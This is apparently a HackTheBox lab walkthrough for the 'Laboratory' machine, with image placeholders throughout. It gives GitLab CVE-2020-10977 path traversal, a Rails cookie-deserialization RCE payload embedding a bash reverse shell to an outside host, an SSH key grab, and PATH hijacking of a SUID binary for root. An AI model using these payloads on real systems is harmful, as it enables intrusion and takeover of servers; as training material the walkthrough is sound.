HackTheBox Laboratory

1. Info

• IP : 10.10.10.216
• OS : Linux
• Difficulty : Easy

2. Nmap

• Payload: sudo nmap -sV 10.10.10.216 -oA nmap/10.10.10.216
• Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• Port 22: OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
• Port 80: Apache httpd 2.4.41
• Port 443: Apache/2.4.41
  • ssl-cert: Subject: commonName=laboratory.htb
• No CVE to use

3. Web Server

• View:
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• Web Server redirect us to laboratory.htb
• Add laboratory.htb to /etc/hosts file
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• View:
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• Gobuster
  • Payload:gobuster dir -u "https://laboratory.htb/" -w ../../../文件/SecLists/Discovery/Web-Content/raft-small-words.txt -x html
  • Output: unable to connect to https://laboratory.htb/: invalid certificate: x509: certificate is valid for git.laboratory.htb, not laboratory.htb
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • re-run Gobuster With option -t to avoid certificate check
  • Add git.laboratory.htb to /etc/hosts
  • Nothing Interesting in Gobuster(laboratory.htb)

4. Web Server(GitLab Server)

• View:
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →
• Sign up
  • Try use normal email account
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • Fail!
  • Try to use laboratory@htb to sign up
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • Success!
• Explore GitLab
  • Project SecureWebsite
    • Author:Dexter McPherson
    • Internal Project
      
      Image Not Showing Possible Reasons

      • The image file may be corrupted
      • The server hosting the image is unavailable
      • The image path is incorrect
      • The image format is not supported

      Learn More →
    • There is no branch in this project
    • Project have index.html code look same as https://laboratory.htb/
    • Issue:
      • Create by Seven
        
        Image Not Showing Possible Reasons

        • The image file may be corrupted
        • The server hosting the image is unavailable
        • The image path is incorrect
        • The image format is not supported

        Learn More →
      • HTTP 418 is a JOKE nothing useful
  • GitLab Server
    • Version: GitLab Community Edition 12.8.1
    • Google it!
      
      Image Not Showing Possible Reasons

      • The image file may be corrupted
      • The server hosting the image is unavailable
      • The image path is incorrect
      • The image format is not supported

      Learn More →
    • CVE-2020-10977

5. Exploit GitLab Server(CVE-2020-10977)

• CVE Info:
  • CVE Number: CVE-2020-10977
  • Affect version: GitLab below 12.9.0
  • CVE Description: GitLab EE/CE 8.5 to 12.9 is vulnerable to a an path traversal when moving an issue between projects.(From NVD)
• Vulnerable Code:
  
  Image Not Showing Possible Reasons

  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported

  Learn More →

#/opt/gitlab/embedded/service/gitlab-rails/lib/gitlab/gfm/uploads_rewriter.rb::
    @text.gsub(@pattern) do |markdown|
          file = find_file(@source_project, $~[:secret], $~[:file])
          break markdown unless file.try(:exists?)

          klass = target_parent.is_a?(Namespace) ? NamespaceFileUploader : FileUploader
          moved = klass.copy_to(file, target_parent)
...
    def find_file(project, secret, file)
        uploader = FileUploader.new(project, secret: secret)
        uploader.retrieve_from_store!(file)
        uploader
      end
      
..............
      
      MARKDOWN_PATTERN=%r{\!?\[.*?\]\(/uploads/(?<secret>[0-9a-f]{32})/(?<file>.*?)\)}.freeze

• Exploit LFI:
  • Need valid username and passwd
  • Exploit PoC: cve-2020-10977.py
  • Payload: python3 cve_2020_10977.py https://git.laboratory.htb user passwd
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • We can view local file by enter absolute path:
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • PoC Analyze:
    • Create 2 Project:
      
      Image Not Showing Possible Reasons

      • The image file may be corrupted
      • The server hosting the image is unavailable
      • The image path is incorrect
      • The image format is not supported

      Learn More →
    • Create Issue:
      
      Image Not Showing Possible Reasons

      • The image file may be corrupted
      • The server hosting the image is unavailable
      • The image path is incorrect
      • The image format is not supported

      Learn More →
    • Issue Data:
      
      Image Not Showing Possible Reasons

      • The image file may be corrupted
      • The server hosting the image is unavailable
      • The image path is incorrect
      • The image format is not supported

      Learn More →
    • Issue description:
      • ![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../..{})'.format(filename)
    • Move Issue:
      
      Image Not Showing Possible Reasons

      • The image file may be corrupted
      • The server hosting the image is unavailable
      • The image path is incorrect
      • The image format is not supported

      Learn More →
• Exploit RCE
  • Need to build same version of GitLab on attacker machine
  • Build GitLab with Docker:sudo docker run gitlab/gitlab-ce:12.8.1-ce.0
  • Enter Docker shell: sudo exec -it docker_img_name bash
  • Get secret_key_base from GitLab(Lab):
    • Absolute Path to File : /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
  • Change Docker's GitLab secret_key_base value to Lab's secret_key_base:
    • Docker Shell:
      • cd /etc/gitlab
      • vim gitlab.rb
      • Add gitlab_rails['secret_key_base']='Lab_secret_key_base_here'
        
        Image Not Showing Possible Reasons

        • The image file may be corrupted
        • The server hosting the image is unavailable
        • The image path is incorrect
        • The image format is not supported

        Learn More →
      • gitlab-ctl reconfigure
  • Start GitLab rails console in Docker:gitlab-rails console
  • Enter Payload in GitLab rails console:
  ​​​​request = ActionDispatch::Request.new(Rails.application.env_config)
  ​​​​request.env["action_dispatch.cookies_serializer"] = :marshal
  ​​​​cookies = request.cookie_jar
  
  ​​​​erb = ERB.new("<%= `bash -c 'bash -i >& /dev/tcp/10.10.14.19/9001 0>&1'` %>")
  ​​​​depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
  ​​​​cookies.signed[:cookie] = depr
  ​​​​puts cookies[:cookie]
  

  • After send payload we will get RCE payload:
    
    Image Not Showing Possible Reasons

    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported

    Learn More →
  • Attacker machine
    • Set up netcat:nc -lvnp 9001
    • Payload:curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=enter_rce_payload_here" -k
      
      Image Not Showing Possible Reasons

      • The image file may be corrupted
      • The server hosting the image is unavailable
      • The image path is incorrect
      • The image format is not supported

      Learn More →
    • Get Shell(User:git)
      
      Image Not Showing Possible Reasons

      • The image file may be corrupted
      • The server hosting the image is unavailable
      • The image path is incorrect
      • The image format is not supported

      Learn More →

6. Privilage Escalation To User Dexter

• Current Info:
  • Username: git
  • Ip address: 172.17.0.2
  • Container: Yes(Docker)
• Gitlab-rails
  • GitLab is a web application built using the Ruby on Rails framework
  • GitLab Rails is GitLab system administrators who are troubleshooting a problem or need to retrieve some data that can only be done through direct access of the GitLab application
  • We can config user data by using GitLab Rails
• Get gitlab admin
  • Get in GitLab Rails Console
    • gitlab-rails console
      
      Image Not Showing Possible Reasons

      • The image file may be corrupted
      • The server hosting the image is unavailable
      • The image path is incorrect
      • The image format is not supported

      Learn More →
    • We can use User.find_by(username: "your_username")
      
      Image Not Showing Possible Reasons

      • The image file may be corrupted
      • The server hosting the image is unavailable
      • The image path is incorrect
      • The image format is not supported

      Learn More →
  • Set user role to admin
    ​​​​​​​​user = User.find_by(username: "jerry")
    ​​​​​​​​user.admin=true
    ​​​​​​​​user.save
    

  • We get admin access to GitLab
    
    
• Explore GitLab
  • In project page we saw another project create by @dexter
    
    
  • Explore the project we find a .ssh file
    
    
• Login Dexter by using ssh
  • Copy id_rsa file to attacker machine
  • Login dexter by using id_rsa file
    
    

7. Privilage Escalation To Root

• Enum
  • Run Linpeas.sh
    
    
  • There is a weird port open(port:60080)
    • Use curl 127.0.0.1:60080 -L
      
      
    • Looks like GitLab Server
    • Nothing to do here
      
      
  • Interesting path
    
    
    • Found a unknown SUID binanry
• Privilage Escalation To Root
  • Analyze docker-security
    • ltrace docker-security
      
      
    • docker-security set uid and gid to 0(which is root),the exec chmod command
    • we can exploit chmod by changing $PATH to fake chmod file
  • Exploit
    • Go to any dir we can write(/tmp/bin)
    • Creat shell script name chmod(need to chomod +x)
      
      
    • Add /tmp to $PATH: export PATH=/tmp/bin:$PATH
    • Run docker-security
      
      
    • Get root!